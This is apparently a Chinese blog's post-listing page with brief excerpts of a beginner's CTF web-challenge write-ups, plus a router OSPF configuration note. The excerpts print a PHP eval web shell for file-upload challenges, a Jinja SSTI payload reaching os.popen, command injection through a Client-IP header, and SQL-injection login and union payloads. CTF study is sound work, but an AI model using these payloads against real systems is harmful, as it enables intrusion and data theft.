自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(19)
  • 收藏
  • 关注

原创 acl 1

首先先配置每个端口ip 地址 192.168.1.1等等 在配置ospf R1 en config router ospf 110 network 192.168.1.0 0.0.0.255 area 0 net 1.1.1.1 0.0.0.0 area 0 R2 192.168.2.0 192.168.1.0 R3 2.0 3.0 R4 3.0 4.4.4.4 0.0.0.0 area 0

2021-06-10 16:58:58 176

原创 [BJDCTF2020]The mystery of ip 1

打开 flag burpsiute 一下 客户端请求头,XFF和client-ip都可。发现可以控制输入 尝试系统命令client-ip:{system(‘ls’)}发现可以,尝试cat /flag,没有任何过滤

2021-06-09 21:13:26 596

原创 [MRCTF2020]你传你呢

上传一个一句话木马 <?php @eval($_POST['attack']) ?> 新建一个php文件 你post了什么 蚁剑的密码就是啥 http://fff167a7-d265-4626-a6fe-a241b5e8c0be.node3.buuoj.cn//upload/6d39f6d978ed8050484b9785fc9f43ce/123.jpg https://baike.baidu.com/item/htaccess/1645473?fr=aladdin htaccess解释

2021-06-04 21:33:24 117 1

原创 [G1CTF2021]ssti

在括号内输入9*9可得结果 81 模板注入可参考 https://blog.csdn.net/xia739635297/article/details/104229582 {% for c in [].__class__.__base__.__subclasses__() %} {%if%20c.__name__=='catch_warnings'%27'%} {{ c.__init__.__globals__['__builtins__'].eval("__import__('os').popen('l

2021-05-23 21:02:43 124

原创 [G1CTF2021]easysql

输入数字有回显 在数字前加空格则会出现hacker 所以得知过滤了空格 搜索可知空格可用注释符/* */代替 用/* */代替空格 联合注入要输入 union select 1’and//1=2//union//select//flag//from//flag//# 用1,2…去试经测试 payload: 1’and//1=2//union//select//1,2,flag//from//flag//# 即可得flag ...

2021-05-23 20:33:00 154

原创 [G1itch]simpleupload 100

2021-05-06 20:18:11 100

原创 2021-03-28ACTF2020 新生赛 Exec

参考链接 https://blog.csdn.net/weixin_44348894/article/details/105347418?utm_medium=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnPai2-1.nonecase&depth_1-utm_source=distribute.pc_relevant_t0.none-task-blog-BlogCommendFromMachineLearnP

2021-03-28 20:13:48 84

原创 upload1

https://zhuanlan.zhihu.com/p/137969179来源链接 创建一个phtml文件. 一句话木马: GIF89a ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210325195738930.png#pic_center) 改 image/jpeg 打开蚁剑输入 搜索flag

2021-03-25 19:59:51 79

原创 BUUCTF [极客大挑战 2019] LoveSQL

参考 https://blog.csdn.net/weixin_44037296/article/details/105084538 随意输入会得到wrong answer 这时候输入万能密码 /check.php?username=admin’ or ‘1’='1&password=1

2021-03-25 17:08:09 134

原创 2021-03-23

打开网页 用bp抓包 可发现pay.php 输入 用hackbar post password 404a 还需要money100000000->1e10

2021-03-23 20:59:12 100

原创 2021-03-22

首先用disresearch 找到 www.zip 下载包打开index.php class.php 构造序列化 保存文件执行一次 可得 参考链接:https://zhuanlan.zhihu.com/p/137898056

2021-03-22 21:03:57 112

原创 2021-03-19

[ACTF2020 新生赛]Include 直接搜64位编码转换 即得 flag

2021-03-19 20:05:41 79

原创 2021-03-14

1;set sql_mode=PIPES_AS_CONCAT;select 1 链接 https://blog.csdn.net/qq_43678005/article/details/108101904

2021-03-14 21:31:46 43

原创 2021-03-12

https://my.oschina.net/guizimo/blog/4262891 附上解答链接 找源代码 从secret 使用brupsuite 可发现隐藏的

2021-03-12 20:28:57 56

原创 2021-03-11

answer: ?cat=dog----->flag 使用万能密码 /check.php?username=1’or 1=1%23&password=1

2021-03-11 12:03:38 48

原创 baby__web

2021-03-02 15:24:25 78

原创 2021-03-02

小宁发现了一个网页,但却一直输不对密码。(Flag格式为 Cyberpeace{xxxxxxxxx} ) 题目场景: 用 转换工具 将16进制 转换为10进制为55,56,54,79,115,69,114,116,107,49,50,如下图所示: 再用python将其转换为字符串为 786OsErtk12,如下图所示: ...

2021-03-02 14:07:22 74

原创 WEB题日常更新(持续更新)

题目1:cookie 打开网址 点击f12 打开网络 点击第一条 直接搜索cookie 可看到cookie.php 将cookie.php输入网址 后再点击f12 点击消息头 即可查看到flag

2021-02-21 15:39:43 63

原创 入门 <小白的日常整理>

题目1: 下载附件,将图片格式转化为txt,用记事本打开,最后可卡到unicode编码=>AscII码可得 网址: https://tool.chinaz.com/tools/unicode.aspx 题目2: 下载附件 将word后缀改成.zip 用7-zip打开,找到document.xml 即得到 flag 题目3: 最基本的摩斯电码转码 网址:http://www.zhongguosou.com/zonghe/moersicodeconverter.aspx 打开网页按F12 查

2021-02-09 13:18:49 33

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除